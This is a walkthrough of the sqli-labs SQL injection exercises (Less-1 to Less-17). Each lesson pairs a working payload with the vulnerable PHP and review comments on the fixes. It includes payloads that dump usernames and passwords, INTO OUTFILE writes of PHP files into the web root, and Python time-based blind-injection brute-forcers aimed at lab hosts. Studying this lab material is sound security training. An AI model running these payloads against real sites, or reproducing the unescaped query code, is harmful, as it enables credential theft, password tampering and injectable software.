Less-1
payload:
?id=0' union select database(),group_concat(username),group_concat(password) from users--+
php:
// $id is concatenated into the statement inside single quotes with no escaping and
// no binding: a quote inside the id parameter closes the literal and the remainder is
// parsed as SQL. Fix: bind $id as a parameter of a prepared statement (mysqli/PDO).
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
Less-2
payload:
?id=0 union select 1,group_concat(username),group_concat(password) from users --+
php:
// Numeric context: $id is interpolated with no quotes at all, so no quote is needed to
// leave the literal. An integer cast before use (or a bound parameter) closes this.
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
Less-3
payload:
?id=0') union select 1,group_concat(username),group_concat(password) from users --+
php:
// Same unescaped interpolation as Less-1; the literal is additionally wrapped in
// parentheses, which only changes what the injected text has to balance. Fix: bind $id.
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
Less-4
payload:
?id=0") union select 1,group_concat(username),group_concat(password) from users --+
php:
// The value is wrapped in double quotes by string concatenation, not escaped; a "
// inside $id still ends the literal. Quoting is not a defence — bind the parameter.
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
Less-5
payload:
?id=0' and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+
php:
// Unescaped single-quoted interpolation as in Less-1. No row data is echoed in this
// lesson; what leaks is the else branch, which prints the raw MySQL error text.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="3" color="#FFFF00">';
    // The database error message is returned verbatim to the client. An error message
    // that embeds query results is a data channel; log it server-side and return a
    // generic message instead.
    print_r(mysql_error());
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
Less-6
payload:
?id=0" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找')))--+
php:
// Double-quote variant of Less-5: the wrapping is done by concatenation, not escaping,
// and the rest of the handler (not repeated here) prints mysql_error() to the client.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
下面的同Less-5
Less-7
Method:into outfile 文件写入操作,如下:
payload:
?id=1')) union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-7\\1.php" --+
php:
// Double-parenthesised, single-quoted interpolation of $id, still unescaped. The error
// branch prints only a fixed message (mysql_error() is commented out), so this lesson
// depends on the DB account being allowed to write files with INTO OUTFILE.
// Mitigation on the DB side: no FILE privilege for the application user and a
// restrictive secure_file_priv; on the application side: bind the parameter.
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo '<font color= "#FFFF00">';
    echo 'You are in.... Use outfile......';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font color= "#FFFF00">';
    // fixed text only; the real error is not disclosed here
    echo 'You have an error in your SQL syntax';
    //print_r(mysql_error());
    echo "</font>";
}
Less-8
payload:
?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-8\\1.php" --+
php:
// Single-quoted interpolation as in Less-1. No error text is emitted in either branch
// (all diagnostic output in the else branch is commented out); the only observable
// difference is whether "You are in" is printed — a one-bit true/false signal.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    //echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
Less-9
payload:
?id=1' union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-9\\1.php" --+
php:
// Single-quoted interpolation as in Less-1. Both branches print the same text and all
// error output is commented out, so neither content nor error messages differ between
// a matching and a non-matching query; only response timing remains observable.
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    // identical message to the success branch on purpose
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
Less-10
payload:
?id=1" union select 1,2,'' into outfile "C:\\xampp\\htdocs\\sqli\\Less-10\\1.php" --+
php:
// Double-quote wrapping by concatenation (no escaping), then the same "both branches
// print the same text" handler as Less-9.
$id = '"'.$id.'"';
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
// The fully built query is echoed to the client: this discloses table/column names
// and shows the caller exactly how its input was spliced in. Remove in production.
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    echo "<br>";
    echo "</font>";
}
else
{
    echo '<font size="5" color="#FFFF00">';
    echo 'You are in...........';
    //print_r(mysql_error());
    //echo "You have an error in your SQL syntax";
    echo "</br></font>";
    echo '<font color= "#0000ff" font size= 3>';
}
Less-11
payload:
uname: 1' union select group_concat(username),group_concat(password) from users;#
php:
// Login handler: both $uname and $passwd are interpolated unescaped into the WHERE
// clause. The leading @ only silences PHP notices on this assignment; it does nothing
// to the query. Fix: prepared statement with both values bound, and compare a
// password hash rather than the stored password.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in\n\n " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    // The matched row's username and password are echoed back to the browser; with
    // a UNION in the query that row can be anything the statement returns.
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // raw MySQL error text sent to the client on failure
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
Less-12
payload:
uname: 1") union select group_concat(username),group_concat(password) from users;#
php:
// Double-quote variant of Less-11: the values are wrapped in " by concatenation and
// then interpolated inside parentheses, still without escaping or binding.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    // the selected row's username and password are written into the page
    echo 'Your Login name:'. $row['username'];
    echo "<br>";
    echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // raw MySQL error text sent to the client on failure
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
Less-13
payload:
uname: 1') and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#
php:
// Parenthesised single-quote variant of Less-11. The row contents are no longer echoed
// (those lines are commented out); the only thing still returned to the client is the
// raw mysql_error() text in the else branch.
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // database error returned verbatim — log server-side, send a generic message
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
Less-14
payload:
uname: 1" and extractvalue(1,concat(1,(select group_concat(username,':',password) from users where username!='此处加入想排除的字符,可往后查找' )));#
php:
// Double-quote variant of Less-13: values wrapped in " by concatenation, interpolated
// without parentheses, no escaping. Row contents are not echoed; mysql_error() is.
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    //echo 'Your Login name:'. $row['username'];
    //echo "<br>";
    //echo 'Your Password:' .$row['password'];
    //echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    // database error returned verbatim — log server-side, send a generic message
    print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
Less-15
Python(盲注):
import requests
import time
import sys
# config-start
sleep_time = 1    # seconds the injected sleep() asks for (see getPayload)
error_time = 0.1  # response time above which exce() treats the request as having slept
# config-end
def getPayload(indexOfResult, indexOfChar, mid):
    """Build the POST body for one (row, character, ascii) guess.

    The ``uname`` field carries the injected boolean expression AND-ed with
    sleep(sleep_time); ``passwd`` is a fixed filler. All three arguments are
    expected as strings (they are concatenated, not formatted).
    """
    # admin' or ()--
    column_name="password"
    table_name="username"  # unused: the text read from is database_name
    database_name="users"
    payload = "((ascii(substring((select " + column_name + " from " + database_name + " limit " + indexOfResult + ",1)," + indexOfChar + ",1)))=" + mid + ")"  # change the SQL expression here
    payload = {"uname":"' or ((" + payload + ") and sleep(" + str(sleep_time) + "))-- ","passwd":"admin"}
    return payload
def exce(indexOfResult,indexOfChar,queryASCII):
    """Send one guess; return True when the round trip took longer than error_time.

    The only signal is wall-clock latency — nothing in the response body is read.
    NOTE(review): server-side this is a burst of near-identical POSTs to the login
    endpoint with latency clustering at sleep_time; binding the query parameters on
    the server removes the oracle, rate limiting the endpoint slows it.
    """
    # content-start
    url = "http://127.0.0.1:801/sqli/Less-15/"
    postData = getPayload(indexOfResult,indexOfChar,queryASCII)
    before_time = time.time()
    requests.post(url, data=postData)
    after_time = time.time()
    # content-end
    use_time = after_time - before_time
    # judge-start
    # When sleep() was executed the guess was correct (most brute-force guesses are
    # wrong, so the SQL is built so that only the correct case sleeps, for efficiency).
    # With a binary search it matters much less which of the two cases does the sleep.
    if abs(use_time) > error_time:
        return True
    else:
        return False
    # judge-end
def doSearch(indexOfResult,indexOfChar):
    """Try every candidate for one character position of one row.

    Returns the first character for which exce() reports a hit, or chr(1) when
    none matched (the caller uses chr(1) as an end-of-row sentinel).
    """
    # candidate list ordered by how often each character occurs in the data,
    # so the likely ones are tried first
    order = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','_','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z',' ','!','"','#','$','%','&','\'','(',')','*','+',',','-','.','/','0','1','2','3','4','5','6','7','8','9',':',';','<','=','>','?','@','[','\\',']','^','`','{','|','}','~']
    for queryChar in order:
        queryASCII = ord(queryChar)
        # substring() positions are 1-based, hence indexOfChar + 1
        if exce(str(indexOfResult),str(indexOfChar + 1), str(queryASCII)):
            return chr(queryASCII)
    return chr(1)
def search():
    """Walk up to 32 rows of up to 32 characters each, printing them as they resolve."""
    for i in range(32): # number of result rows to walk
        counter = 0
        for j in range(32): # length of one result
            counter += 1
            temp = doSearch(i, j) # original note: "start querying from 255"; doSearch now walks its ordered list
            if ord(temp) == 1: # chr(1) is doSearch's "nothing matched" sentinel: this row is finished
                break
            sys.stdout.write(temp)
            sys.stdout.flush()
        if counter == 1: # the very first character missed, so there is no such row: every row has been walked
            break
        sys.stdout.write("\r\n")
        sys.stdout.flush()
search()  # runs at import/script start; there is no __main__ guard
代码来源:https://www.jianshu.com/p/e5a42373ed12
php:
// Login handler with unescaped $uname/$passwd interpolation as in Less-11, but with
// every content and error output commented out: the response body is the same for a
// hit and a miss, so only response timing differs. The built query is still echoed.
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
// the complete statement, including the caller's input, is written to the page
echo $sql;
echo "<br>";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
    //echo '<font color= "#0000ff">';
    echo "<br>";
    echo '<font color= "#FFFF00" font size = 4>';
    //echo " You Have successfully logged in\n\n " ;
    echo '<font size="3" color="#0000ff">';
    echo "<br>";
    //echo 'Your Login name:'. $row['username'];
    echo "<br>";
    //echo 'Your Password:' .$row['password'];
    echo "<br>";
    echo "</font>";
    echo "<br>";
    echo "<br>";
    echo '<img src="../images/flag.jpg" />';
    echo "</font>";
}
else
{
    echo '<font color= "#0000ff" font size="3">';
    //echo "Try again looser";
    //print_r(mysql_error());
    echo "</br>";
    echo "</br>";
    echo "</br>";
    echo '<img src="../images/slap.jpg" />';
    echo "</font>";
}
Less-16
把 Less-15 脚本 SQL 语句中前面的 `'` 换成 `")` 即可
Less-17
php
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
// Hides PHP warnings/notices from the page. It does not suppress the database error
// text that the handler below prints explicitly with print_r(mysql_error()).
error_reporting(0);
function check_input($value)
{
    // Legacy sanitiser for a single form value: truncate, undo magic-quotes
    // escaping when the runtime applied it, then either cast to int or wrap
    // the escaped text in single quotes for splicing into a SQL literal.
    // get_magic_quotes_gpc() and mysql_real_escape_string() are removed in
    // current PHP, so this only runs on the old mysql extension.

    // Keep the first 15 characters (empty() also treats "0" as empty, in
    // which case the value is left untouched, as before)
    if (!empty($value)) {
        $value = substr($value, 0, 15);
    }

    // Undo the automatic backslash escaping of magic_quotes_gpc, when enabled
    if (get_magic_quotes_gpc()) {
        $value = stripslashes($value);
    }

    // Digit-only input becomes an integer; anything else is escaped and quoted
    return ctype_digit($value)
        ? intval($value)
        : "'" . mysql_real_escape_string($value) . "'";
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
    //making sure uname is not injectable
    $uname=check_input($_POST['uname']); // uname goes through check_input, see the function above
    // passwd is NOT passed through check_input: it reaches the UPDATE below unescaped
    $passwd=$_POST['passwd'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the submitted password is appended in clear text to result.txt,
    // opened with a relative path (presumably under the web root — verify). Credentials
    // must not be logged; if an audit trail is needed, log the username and outcome only.
    $fp=fopen('result.txt','a');
    fwrite($fp,'User Name:'.$uname."\n");
    fwrite($fp,'New Password:'.$passwd."\n");
    fclose($fp);
    // connectivity
    @$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
    // the built query is echoed to the client (information disclosure)
    echo $sql;
    echo "<br>";
    $result=mysql_query($sql);
    $row = mysql_fetch_array($result);
    //echo $row;
    if($row)
    {
        //echo '<font color= "#0000ff">';
        $row1 = $row['username'];
        //echo 'Your Login name:'. $row1;
        // $passwd is interpolated unescaped: this UPDATE is the injection point of the
        // lesson. $row1 comes from the database, so it is not trusted either.
        // Fix: prepared statement with both values bound (and store a password hash).
        $update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
        mysql_query($update);
        echo "<br>";
        if (mysql_error())
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            // raw MySQL error from the UPDATE is returned to the client: this is the
            // error-based channel; log it server-side and return a generic message
            print_r(mysql_error());
            echo "</br></br>";
            echo "</font>";
        }
        else
        {
            echo '<font color= "#FFFF00" font size = 3 >';
            //echo " You password has been successfully updated " ;
            echo "<br>";
            echo "</font>";
        }
        echo '<img src="../images/flag1.jpg" />';
        //echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        echo '<font size="4.5" color="#FFFF00">';
        //echo "Bug off you Silly Dumb hacker";
        echo "</br>";
        echo '<img src="../images/slap1.jpg" />';
        echo "</font>";
    }
}
?>
python
import requests
# Time-based probe against the Less-17 handler shown above: the passwd field is not
# escaped, so the IF(..., sleep(3), 1) placed in it runs inside the UPDATE, and a
# response slower than 2 s is taken as "this character matched".
# NOTE(review): `str` shadows the builtin; any later str() call in this file would break.
str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,_!@#$%^&*."
url = "http://192.168.184.1:801/sqli/Less-17/"
for i in range(1,200):  # character position (1-based, as substr() expects)
    for j in str:
        #1' where username='admin' and if(mid((select database()),1,1)= 's',sleep(3),1)#
        #1' where username='admin' and if(mid((select database()),{},1)= '{}',sleep(3),1)#
        #1' where username='admin' and if(mid((select group_concat(table_name,'') from information_schema.tables where table_schema=database()),{},1)= '{}',sleep(3),1)#
        #1' where username='admin' and if(mid((select group_concat(column_name,'') from information_schema.columns where table_name='users' and table_schema=database()),{},1)= '{}',sleep(3),1)#
        #1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#
        flag = "1' where username='admin' and if(substr((select * from (select GROUP_CONCAT(BINARY(username),',',BINARY(password)) from users) as temp),{},1)= '{}',sleep(3),1)#".format(i,j)
        data = {"uname":"admin","passwd":flag,"submit":"submit"}
        r = requests.post(url,data=data)
        #print("{}".format(r.status_code))
        # only latency is inspected; the response body is never read
        if r.elapsed.total_seconds()>2:
            print(j,end = '')
            break
加上 `where username='admin'` 是为了减少爆破时间,因为在改 password 的时候就只会改 admin 的 password 了;如果不加上亦可,不加上的话会将所有的 password 都改为 1,但也达到了目的。在最后爆破字段的时候采用了一个虚表 temp,因为 update 操作和 select 操作都作用于一张表,且会报错:`Table 'test' is specified twice, both as a target for 'UPDATE' and as a separate source for data`。所以采用虚表进行盲注,且使用了 BINARY 函数来区分表中内容的大小写。